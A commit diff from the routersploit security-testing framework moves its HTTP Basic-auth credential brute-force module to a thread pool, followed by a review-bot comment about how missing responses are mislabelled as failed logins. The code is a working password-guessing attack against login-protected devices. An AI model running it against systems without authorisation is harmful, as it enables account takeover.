Commit b20ff7cf by fwkz

Using ThreadPoolExecutor in creds/http_basic_bruteforce

parent 66bdaefa
...@@ -6,15 +6,16 @@ from routersploit import ( ...@@ -6,15 +6,16 @@ from routersploit import (
wordlists, wordlists,
print_status, print_status,
print_error, print_error,
LockedIterator,
print_success, print_success,
print_table, print_table,
sanitize_url,
http_request, http_request,
boolify,
multi, multi,
threads,
validators,
) )
from routersploit.exceptions import StopThreadPoolExecutor
class Exploit(exploits.Exploit): class Exploit(exploits.Exploit):
""" """
...@@ -36,17 +37,15 @@ class Exploit(exploits.Exploit): ...@@ -36,17 +37,15 @@ class Exploit(exploits.Exploit):
], ],
} }
target = exploits.Option('', 'Target IP address or file with target:port (file://)') target = exploits.Option('', 'Target IP address or file with target:port (file://)', validators=validators.url)
port = exploits.Option(80, 'Target port') port = exploits.Option(80, 'Target port')
threads = exploits.Option(8, 'Numbers of threads') threads = exploits.Option(8, 'Numbers of threads')
usernames = exploits.Option('admin', 'Username or file with usernames (file://)') usernames = exploits.Option('admin', 'Username or file with usernames (file://)')
passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)') passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
path = exploits.Option('/', 'URL Path') path = exploits.Option('/', 'URL Path')
verbosity = exploits.Option('yes', 'Display authentication attempts') verbosity = exploits.Option(True, 'Display authentication attempts', validators=validators.boolify)
stop_on_success = exploits.Option('yes', 'Stop on first valid authentication attempt') stop_on_success = exploits.Option(True, 'Stop on first valid authentication attempt', validators=validators.boolify)
credentials = []
def run(self): def run(self):
self.credentials = [] self.credentials = []
...@@ -54,7 +53,7 @@ class Exploit(exploits.Exploit): ...@@ -54,7 +53,7 @@ class Exploit(exploits.Exploit):
@multi @multi
def attack(self): def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) url = "{}:{}{}".format(self.target, self.port, self.path)
response = http_request(method="GET", url=url) response = http_request(method="GET", url=url)
if response is None: if response is None:
...@@ -74,41 +73,31 @@ class Exploit(exploits.Exploit): ...@@ -74,41 +73,31 @@ class Exploit(exploits.Exploit):
else: else:
passwords = [self.passwords] passwords = [self.passwords]
collection = LockedIterator(itertools.product(usernames, passwords)) collection = itertools.product(usernames, passwords)
self.run_threads(self.threads, self.target_function, collection) with threads.ThreadPoolExecutor(self.threads) as executor:
for record in collection:
executor.submit(self.target_function, url, record)
if len(self.credentials): if self.credentials:
print_success("Credentials found!") print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password") headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials) print_table(headers, *self.credentials)
else: else:
print_error("Credentials not found") print_error("Credentials not found")
def target_function(self, running, data): def target_function(self, url, creds):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) user, password = creds
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.encode('utf-8').strip() user = user.encode('utf-8').strip()
password = password.encode('utf-8').strip() password = password.encode('utf-8').strip()
response = http_request(method="GET", url=url, auth=(user, password)) response = http_request(method="GET", url=url, auth=(user, password))
if response.status_code != 401: if response is not None and response.status_code != 401:
if boolify(self.stop_on_success): print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=self.verbosity)
running.clear()
print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
self.credentials.append((self.target, self.port, user, password)) self.credentials.append((self.target, self.port, user, password))
if self.stop_on_success:
raise StopThreadPoolExecutor
else: else:
print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity) print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=self.verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
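Review bot: In the new `target_function`, a request that gets no response at all falls into the `else` branch and is logged as "Authentication Failed", because `response is not None and response.status_code != 401` is false both for a 401 and for a transport error. The output then reports a credential pair as rejected when it was never evaluated, so a run with timeouts or dropped connections gives a misleading result table. Handle the missing response on its own before the status test, with `if response is None:` followed by a `print_error` that reports the connection failure and a `return`. How `raise StopThreadPoolExecutor` inside a submitted task stops the remaining records depends on routersploit's own `threads.ThreadPoolExecutor`, which is not shown here, so a short comment at the raise stating the intended effect would help. `attack()` is only partly visible across these hunks.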